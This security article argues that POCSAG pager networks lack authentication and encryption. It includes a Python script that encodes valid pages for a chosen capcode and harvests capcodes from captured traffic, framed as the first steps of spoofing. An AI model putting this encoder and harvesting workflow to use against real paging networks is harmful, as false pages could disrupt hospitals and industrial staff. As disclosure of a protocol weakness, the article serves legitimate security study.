POCSAG pagers: vulnerable by design
Pagers, or "beepers," are personal communication devices that were highly popular before the advent of mobile phones. They let users receive short text messages or alerts anytime and anywhere, which revolutionized communication at the time. Today pagers are far less common but remain in use in some sectors, despite security weaknesses that stem from their simplicity and their lack of modern protection measures.
In this article, we will analyze the inherent vulnerabilities in the design of certain protocols used by pagers, such as POCSAG. The use of these insecure protocols, combined with the emergence and democratization of SDR (Software Defined Radio) hardware, forms a dangerous cocktail that, in our view, should prompt a reconsideration of their suitability in critical sectors like healthcare or industry.
How do pager networks work?
A pager network operates by transmitting messages over a radio frequency to devices that are always listening. Each pager has an individual identifier, known as a capcode or RIC (Radio Identity Code), which tells it which of the messages on the channel are addressed to it.
Each pager is programmed to respond to one or more capcodes, determining which messages it should receive and how it should react. This system allows for both individual messaging and broadcasting, where a single message can be sent to multiple devices sharing the same capcode.
However, these networks lack any form of authentication, integrity protection or encryption: messages are transmitted in the clear, and a pager accepts any correctly formatted transmission carrying its capcode. This creates a significant security risk, as anyone with a suitable transmitter can inject messages into the network simply by knowing the frequency and the target capcode.
While this lack of authentication makes it easy to set up a personal pager network quickly, it poses a real threat in production deployments. For example, an attacker could inject false pages into a hospital paging system or spoof alarm notifications sent to industrial staff, potentially causing severe disruption.
Types of messages sent to a pager
Pagers allow the reception of multiple types of message. The main ones are:
- Alert Messages: Trigger simple signals like vibrations or audible notifications, often used in emergency situations.
- Numeric Messages: Digits only, such as a callback phone number or a short code agreed in advance between the service's users.
- Alphanumeric Messages: These are the most complex, allowing both text and numbers.
✅ This flexibility makes pager networks useful for sending anything from critical emergency alerts to more detailed instructions or notifications.
How is a POCSAG message composed?
Below, we detail the main parameters required to send a POCSAG message:
- Bitrate: This is the speed at which the message will be transmitted. The most common bit rate for POCSAG transmissions is 1200 bps, although some networks use 512 or 2400 bps.
- Phase: In POCSAG transmissions there are two possible polarity configurations, N (normal) and P (inverted, as labelled in tools such as the PortaPack POCSAG transmitter). The setting determines which direction of the FSK frequency shift represents a binary 0 and which a binary 1. Most pagers work with one of the two, so it is essential to match the network's configuration for the message to be decoded at all.
- Type: This determines the message format. You can choose between alert, numeric, or alphanumeric.
- Function: This is the pager function code, a 2-bit value (0 to 3) carried in the address codeword next to the capcode. Function codes can trigger different responses on the pager, such as a sound, a vibration, or a specific display mode; which code means what depends on how the pager was programmed.
- Message: This field contains the actual body of the message to be transmitted.
✅ To transmit the message, the target pager's capcode, its unique identifier, is also required. The capcode is usually printed on a label on the back of the pager.
Is spoofing easy in POCSAG? What is needed?
It is surprisingly simple and inexpensive. Basic hardware such as the popular HackRF, combined with a PortaPack (an add-on with a screen, controls and a battery that lets the HackRF run without a computer), is often sold as a bundle for around €200.
In addition, this hardware can be extended with further capabilities using the well-known Mayhem firmware, which includes POCSAG receive and transmit applications.
With just that, one would have the necessary equipment to intercept communications in a pager network and even inject messages once the network frequency and individual device identifiers have been obtained.
Vulnerability by design
Since POCSAG has neither authentication nor encryption, the information needed for a later attack, the network frequency and the capcodes in use, can be collected passively. Any SDR receiver capable of tuning the paging band can capture the transmissions, and decoding them (in true Wireshark style) reveals the capcode and function code of every page sent. Once a capcode is known, impersonating the network towards that pager requires nothing more than transmitting a correctly formatted message with it.
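As an added example (not code from the original article, nor from any pager product or SDR firmware), the following Python script puts the composition rules from the "How is a POCSAG message composed?" section and the passive-capture idea above into working code. It builds the codewords of a POCSAG transmission for a given capcode, function code and message, and it parses a received bitstream back into the capcodes and function codes being paged, which is exactly what an attacker harvests before spoofing. The script works at the bit level only: bitrate, frequency and FSK polarity are left to the radio. The sync and idle codewords and the BCH(31,21) generator are the standard POCSAG values; the capcode 1234567 and the message text are constructed sample inputs; padding numeric messages with spaces and zero-padding the last alphanumeric codeword are assumptions that match common encoders.

```python
"""POCSAG codeword encoder plus a passive decoder that pulls capcodes and
function codes out of a received bitstream. Added illustration, not the
article's own code. Radio-level parameters (frequency, bitrate, polarity)
are out of scope: everything here is at the bit level."""

SYNC_CODEWORD = 0x7CD215D8     # marks the start of every 16-codeword batch
IDLE_CODEWORD = 0x7A89C197     # fills unused codeword slots
BCH_GENERATOR = 0x769          # BCH(31,21): x^10+x^9+x^8+x^6+x^5+x^3+1
PREAMBLE_BITS = 576            # alternating 1/0 so receivers can lock on
CODEWORDS_PER_BATCH = 16       # 8 frames of 2 codewords each

# Numeric messages use 4-bit symbols: the digits plus a few specials.
NUMERIC_SYMBOLS = {**{str(d): d for d in range(10)},
                   'U': 0xB, ' ': 0xC, '-': 0xD, ']': 0xE, '[': 0xF}


def bch_parity(info21: int) -> int:
    """10 BCH check bits for the 21 information bits (flag + 20 data bits)."""
    rem = info21 << 10
    for bit in range(30, 9, -1):            # polynomial long division mod 2
        if rem & (1 << bit):
            rem ^= BCH_GENERATOR << (bit - 10)
    return rem & 0x3FF


def make_codeword(info21: int) -> int:
    """flag(1) | data(20) | BCH(10) | even parity(1) = one 32-bit codeword."""
    cw31 = (info21 << 10) | bch_parity(info21)
    return (cw31 << 1) | (bin(cw31).count("1") & 1)


def codeword_is_valid(cw: int) -> bool:
    """All a receiver checks: the BCH bits and the overall even parity."""
    return make_codeword(cw >> 11) == cw


def address_codeword(ric: int, function: int) -> int:
    """Flag 0, upper 18 bits of the 21-bit capcode, 2 function bits.
    The low 3 bits of the capcode are not sent: they choose the frame."""
    assert 0 <= ric < (1 << 21) and 0 <= function <= 3
    return make_codeword(((ric >> 3) << 2) | function)


def alpha_bits(text: str) -> list:
    """Alphanumeric: 7-bit ASCII, each character sent LSB first."""
    return [(ord(c) >> i) & 1 for c in text for i in range(7)]


def numeric_bits(text: str) -> list:
    """Numeric: 4-bit symbols sent LSB first, 5 per codeword.
    Padding with spaces (0xC) is an assumption matching common encoders."""
    symbols = [NUMERIC_SYMBOLS[c] for c in text.upper()]
    symbols += [NUMERIC_SYMBOLS[' ']] * (-len(symbols) % 5)
    return [(s >> i) & 1 for s in symbols for i in range(4)]


def message_codewords(bits: list) -> list:
    """Pack the bitstream into 20-bit chunks with flag 1 (zero-padded at the end)."""
    bits = bits + [0] * (-len(bits) % 20)
    words = []
    for i in range(0, len(bits), 20):
        data = int("".join(map(str, bits[i:i + 20])), 2)
        words.append(make_codeword((1 << 20) | data))
    return words


def encode_transmission(ric: int, function: int, message: str,
                        numeric: bool = False) -> list:
    """All codewords of one page: a sync word plus 16 slots per batch, with
    the address codeword placed in frame (ric & 7). An empty message yields
    an address-only (alert/tone) page."""
    bits = numeric_bits(message) if numeric else alpha_bits(message)
    slots = [IDLE_CODEWORD] * (2 * (ric & 7))          # skip to the pager's frame
    slots += [address_codeword(ric, function)] + message_codewords(bits)
    slots += [IDLE_CODEWORD] * (-len(slots) % CODEWORDS_PER_BATCH)
    out = []
    for i in range(0, len(slots), CODEWORDS_PER_BATCH):
        out += [SYNC_CODEWORD] + slots[i:i + CODEWORDS_PER_BATCH]
    return out


def to_bitstream(codewords: list) -> str:
    """Preamble followed by the codewords, MSB first, as a '0'/'1' string."""
    return "10" * (PREAMBLE_BITS // 2) + "".join(f"{cw:032b}" for cw in codewords)


def decode_addresses(bitstream: str) -> list:
    """Passive capcode harvest: find sync words, walk the 16 slots of each
    batch and rebuild full capcodes from address codewords plus frame index."""
    sync = f"{SYNC_CODEWORD:032b}"
    batch_bits = 32 * (CODEWORDS_PER_BATCH + 1)
    found, pos = [], bitstream.find(sync)
    while pos != -1 and pos + batch_bits <= len(bitstream):
        for slot in range(CODEWORDS_PER_BATCH):
            start = pos + 32 * (1 + slot)
            cw = int(bitstream[start:start + 32], 2)
            if cw == IDLE_CODEWORD or (cw >> 31) or not codeword_is_valid(cw):
                continue                       # idle, message word, or corrupt
            ric = (((cw >> 13) & 0x3FFFF) << 3) | (slot // 2)  # frame = low 3 bits
            found.append((ric, (cw >> 11) & 3))
        pos = bitstream.find(sync, pos + batch_bits)
    return found


if __name__ == "__main__":
    # Constructed sample: page capcode 1234567 with function 3 and text "HELLO".
    tx = encode_transmission(1234567, 3, "HELLO")
    print(f"{len(tx)} codewords; harvested: {decode_addresses(to_bitstream(tx))}")
```

Two details matter for anyone decoding captured traffic: the low three bits of the capcode are not in the address codeword at all but are implied by the frame in which it appears, and a receiver accepts any codeword whose BCH and parity bits check out, which is the whole of the "authentication" the protocol offers. Feeding the decoder a demodulated bitstream from an SDR receiver therefore yields every capcode and function code paged on the channel, ready to be reused by the encoder.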
Conclusions
In this article, we reviewed how certain messaging protocols used in pager networks, POCSAG among them, are inherently insecure because they lack authentication, integrity protection and encryption. The receiving pager treats any correctly formatted transmission carrying its capcode as legitimate, and the capcodes themselves travel in the clear, so spoofing a message on the network requires nothing beyond readily available and affordable tools.
The design of these protocols, obsolete in terms of security, is a risk in itself. This underscores the need for stronger security measures, or for moving away from outdated technologies that are still widely used but no longer meet modern security requirements.